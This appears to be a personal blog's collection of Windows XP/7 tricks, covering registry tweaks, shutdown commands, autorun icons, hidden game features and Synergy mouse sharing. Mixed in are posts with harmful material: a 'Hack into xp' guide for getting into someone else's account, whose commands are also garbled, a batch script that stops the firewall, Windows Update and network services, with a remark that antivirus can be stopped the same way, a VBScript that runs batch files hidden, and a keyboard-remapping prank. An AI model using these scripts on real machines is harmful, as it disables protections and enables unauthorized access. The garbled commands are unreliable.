Showing posts with label Window XP. Show all posts
Showing posts with label Window XP. Show all posts

Wednesday, August 6, 2014

Share your mouse and keyboard

Most people think of their computers as single, isolated units. Our mission is to change that so people think of all their computers as a single seamless system.
Synergy brings your computers together in one cohesive experience; its free and open source cross-platform software for sharing one mouse and keyboard between multiple computers on your desk. It works on Windows, Mac OS X and Linux allowing you to seamlessly move your mouse cursor between computers.

Synergy brings your devices together in one cohesive experience.

  • We're fully cross platform, which we've been doing for 10 years.
  • KVMs single out your machines, Synergy brings them together.
  • Seamlessly move your mouse to any computer and start typing.
  • Works on all major operating systems (Windows, Mac OS X, and Linux).
  • Share your clipboard (copy and paste) between your computers.
  • Drag and drop files from one computer to another (Premium).
  • Encryption keeps sensitive data safe on public networks.
  • Save space on your desktop by using one keyboard and mouse.
  • Network-based (IP) software KVM switch (non-video).
  • An alternative to a keyboard/mouse USB switch.
  • Useful for multiboxing (WoW and other games).
  • Easily turn your old laptop or desktop PC into a second screen.
  • Avoid needing VNC for computers close by.
  • Make use of your Raspberry Pi on your desktop.

Download: http://synergy-project.org/download/

Tuesday, October 2, 2012

Change USB Drive Default Icon!




Have you ever wanted to change your pen drive or any removable drive icon and failed.Then you are at the right place and applying below steps you will succeed. Now let's do

1. Open notepad and Copy-paste the below code in your Notepad:

[autorun]
Icon=img.ico

Replace the img.ico with the name of the icon which you are going replace with the default one.


2. Now, save this notepad file as autorun.inf in the root of USB drive.


3. Paste the new image file in the root of USB drive.


4. Safely remove the USB drive and reinsert the drive to view a new icon.


Have fun!!!!!!!!1

Monday, August 13, 2012

Browse through MS Calculator in XP!!!!!!


Now access the internet via your standard Microsoft Calculator using this trick.
You can do this for fun or when your browser is messed up for some unexplainable reason.

Steps:

1. Open your MS Calculator. 

                  Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key or clicking on help button .

3. Click the top-left corner icon of the help window once .

4. Select 'Jump to URL'.

5. Type your address into the avaliable field, but remember to type http:// before www


Have fun !!!
Now access the internet via your standard Microsoft Calculator using this trick.
You can do this for fun or when your browser is messed up for some unexplainable reason.

Steps:

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Questionmark).

4. Select 'Jump to URL'.

5. Type your address into the avaliable field, but remember to type http://, and not just www. (or equivalent).

enjoy the trick1

Sunday, April 1, 2012

Remove right click shortcuts!



The context menu or right click option becomes too large after installation of large number of apps. Some apps shortcuts are useful and others are useless .We can  put only those items in right click menu which we use frequently.However there is no direct method to remove an item from the right click menu and you have make changes in the registry.


Caution: Backup registry before editing.


1. Open Run from the start menu and enter regedit in it.
2. IRegistry Settings window, Navigate to
HKEY_CLASSES_ROOT\*\shellexe\ContextMenuHandlers
  • 3. Now from the list, Right Click on the item which you want to remove from your Context menu.
  • Select delete from the menu.
  • Refresh your Desktop and Right Click on any icon and you will be glad to see that unwanted item is removed from context menu.
  • Along with removing items from the Context Menu you also add System files in it.

Friday, December 23, 2011

Replace window's time with your text



if you want to add your name to the right bottom corner of your computer window where time is shown you have to follow below steps:

1. Go to:
            Start.>
            Control Panel.>
            Regional and Language Options.

2. Click the Customize button.
3. Select Time tag.
4. Highlight AM and type any text or your  name you want to display .
5. Repeat step  with PM.
6. click apply and than ok.......

Enjoy the trick.



Hack into xp......



if you ever wanted to hack in xp account here is the trick for you!
1 . Boot anyone's xp computer who has a limited account active (i.e. guest) When you boot, boot to safe mode w/ dos prompt. (push F8 during startup) Type

C:\cd windows\system 32


2. While still in system32 type:

command userpasswords2

3.Then unselect the box that says "this computer requires a password etc."
Reboot!

You just hacked XP


Friday, November 4, 2011

Make your computer welcome you when it starts


You have seen in many movies when actor starts his computer it welcome him by name.You can also Do same thing in your computer.This trick include two steps first making vbs file and placing it in start up folder in c drive.
Now let first make a vbs file:

1.Open Notepad.

2.Type below code in it


Dim Message,Speak
Message="Welcome to your pc maneesh have a good day"
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message

3.You can change message to any text you want your computetr speak.

4. Save this file with *.vbs name.

Now let place this file in window startup folder.
In window7 address of start up folder:
C:\Users\Maneesh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\starup

Change name of your processor


If your processor is of old generation and you feel ashamed when someone checks properties of your computer.
Now this trick can change the processor name of your computer.You can name it anything whatever you want.
This trick needs change in registry so before applying this trick please backup your registry.Here the trick goes.....

1. Open Run (start->all programs-> accessories->run).

2.Type regedit.

3.In regedit click on  hkey-local-machin in left side tree navigation.

4.Now  traverse as below

hardware>description>system>central processor>processor name string

5.In pop up window enter any name in  value data.
eg. Intel(R) Core(TM)2 Duo CPU     E7400  @ 2.80GHz

Now apply this trick and have fun.

Wednesday, April 6, 2011

Use Symbols In Notepad


Here iam going to explain you how you can add symbols in notepad
1.open notepad.
2.click format in menubar.
3.select font. A dilog box will popup.
4.In font select webdings.
5.select size 72.

Now you can add symbols by pressing the keys. For more symbols press shift+key.



Monday, April 4, 2011

Stop Windows Sevices-service disabler:



The following piece of code is used for stopping some critical windows services.
1.Open Notepad
2.Type
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
3.save ads*.bat

This program when executed will stop the ‘windows firewall’ service that is required to block
unwanted datagram’s coming from the internet, ‘windows update’ service that is required to update
windows patches and so on, ‘workstation’ service that is required for the computer to establish a peer to
peer connection, ‘DHCP Client’ service that is required to register an available IP address from the
DHCP server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain Name) into
its equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in the
spool, and then the ‘themes’ service that is required to offer Themes and other graphical appearance.
Likewise you may stop any of the services, even the anti-virus service that offers protection from
malwares will be stopped in this way.
So when these services get stopped, it almost becomes impossible for the machine to offer the service
what they are supposed to do so, hence the user has to manually enable and start these services again.

Keystroke Re-mapper-Change Key Stroke



This  batch program helps re-map the keystroke by changing the ‘scancodemap’
entry in the registry editor. The code that I have enclosed here changes the key from A to B, so that if any
users press ‘a’ key on the keyboard he will be getting the ‘b’ displayed on the screen, likewise you may
map any keys.
@echo off
reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode
Map" /t REG_BINARY /d 00000000000000000200000030001e0000000000
exit
If you want to create a new batch file for remapping other keys, you have to refer the ascii codes for each
keys that was pre assigned, and you can Download

Running Batch File As VB Script



1.Open Notepad.
2.Type
Set objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE

Note:Replace the ‘C:\ yourfile.bat’ with the actual name of the batch file that you have created, along with the location and then save this file with a .vbs extension. Now you may execute this VBScript file to run the batch file too, so there is no need for you to execute the batch file separately. Now the batch was still running in the background and remains hidden.
The only way to end the process is to open the task manager and end the process  WScript.

Saturday, April 2, 2011

Create a Shortcut to Lock Your Computer



Here is how you can Create a Shortcut to Lock Your Computer.

1. Right-click the desktop. Point to New, and then click Shortcut.
2. The Create Shortcut Wizard opens. 
3.In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. 
4.Enter a name for the shortcut. 
5.Click Finish. 

You can also change the shortcut's icon. To change the icon: 
1.Right click the shortcut and then select Properties.
2. Click the Shortcut tab, and then click the Change Icon button. 
4.In the Look for icons in this file text box, type: Shell32.dll. Click OK. 
5.Select one of the icons from the list and then click OK 

You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Remove Shutdown Option From Start Menu



Here is how you can remove the shutdown option from start menu in  computer by editing registry


Regedit

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Display Text on startup:



Here is the way how you can display a text at system start up by editing registry.

REGEDIT

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your notice text"

Saturday, March 26, 2011

Time Your computer shutdown




Here is how you can  shutdown your computer in specified time.

1.Through Command
Go to run in start menu and input this command
    shutdown -s -t 1800
this will shutdown your computer after half an hour. you can replace the 1800 to any time limit you want the computer to shutdown .
Note:Time should always be expressed in seconds.

2.Through Shortcut
open  notepad and type
shutdown -s -t 1800
now save this file as *.bat
Just double clicking this file will time your computer shutdown.
On the desktop right click and create a new shortcut in the location type address of your file.

3.Force Shutdown:

Operator -f  will force a shutdown on system. suppose you want the computer to shutdown as quickly as possible you can give command
shutdown -s -f -t 00

4.Stopping The Shutdown:
Any time when you want to stop the shutdown  use a -a operator(standing for abort)
the command is
shutdown -a 

SOME OTHER OPTIONS:
shutdown –l (log off)
shutdown -r (restarting)
shutdown -r -t 1800 (timer for restarting in 1 hour)
shutdown -r -f -t 00 (quick restart)

Hide Files In An Image



Using steps given below you can hide files in an image

1. Collect the files you wish to hide, and the image file, and place them in a folder.

2. Add the files into a winrar .rar or .zip.

3. Open command prompt .
Start > Run > cmd
4. In Command Prompt, navigate to the folder where your  files are by typing
cd location .
5. Type in cmd
copy /b image.jpg + hide.rar image.jpg



To extract your file, there are two ways
a) Change the file extension from image.jpg to hide.rar, then open and your file is there.
b)Right click ihe image, open with WinRar and your file is there.

Friday, March 25, 2011

Secrets Of Paint



Create a trail image
1.    Open Paint, then open an image.
2.    Right-click on the image and select "Select All"
3.    Now hold the "Shift" key and move the image around. The image will be drawn with trail.

10x Zoom
1.    Open Paint, then open a small image.
2.    Select the zoom "Magnifier" tool.
3.    Windows Paint lists out the zoom options from 1x to 8x, but there is a 10x...
4.    After selecting the Magnifier tool, point the mouse right at the border line right under "8x" and left-click. There you go.. the hidden 10x.

Secrets Of Notepad


Create a logs
1.    Open Notepad
2.    On the very first line, type in ".LOG" (without quotes) then press Enter for a new line
3.    Now you can type in some text if you want, then save the file.
4.    Next time when you open the file, notice its contents. Notepad automatically adds a time/date log everytime you open the file.

Text becomes unreadable
1.    Open Notepad
2.    On the very first line, type in "dont eat the donut" (without quotes) then save and close the file. Note: the file should have only one line of the text above.
3.    Now, open the same file. You'll notice the text becomes unreadable squares. (try this with different text with the same format and length).

Thursday, March 24, 2011

Window XP Games Secret



Solitaire:
Win instantly
 Press Alt + Shift + 2 to win instantly

Solitaire
Draw using only 1 card instead of 3
 Hold down Ctrl + Alt + Shift then click on unopen cards to draw.


FreeCell: 
  Win instantly
1. Hold down Ctrl + Shift + F10 while playing, then click Abort.
2. Now move one card.


FreeCell:
Hidden Game Modes
1. Go to "Game" menu choose "Select Game"
2. Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)


Hearts: 
Show All Card
This requires a modification in your registry. Be sure you follow the steps carefully.It might damage your window.
1. Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
2. Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
3. Right-click on the right panel and create a new String value with the name "ZB"
4. Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
5. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards


Minesweeper: 
Stop The Timer
1. When you start to play a new game, the timer is ticking...
2. Press Windows Key + D to show desktop.
3. Now come back to the game by selecting it from the taskbar. The timer is stopped.


Pinball:
* Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
* Extra Balls: Type 1max at a new game to get extra balls.
*Gravity Well: Type gmax at a new game to activate Gravity Well.
* Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
* Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
*Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews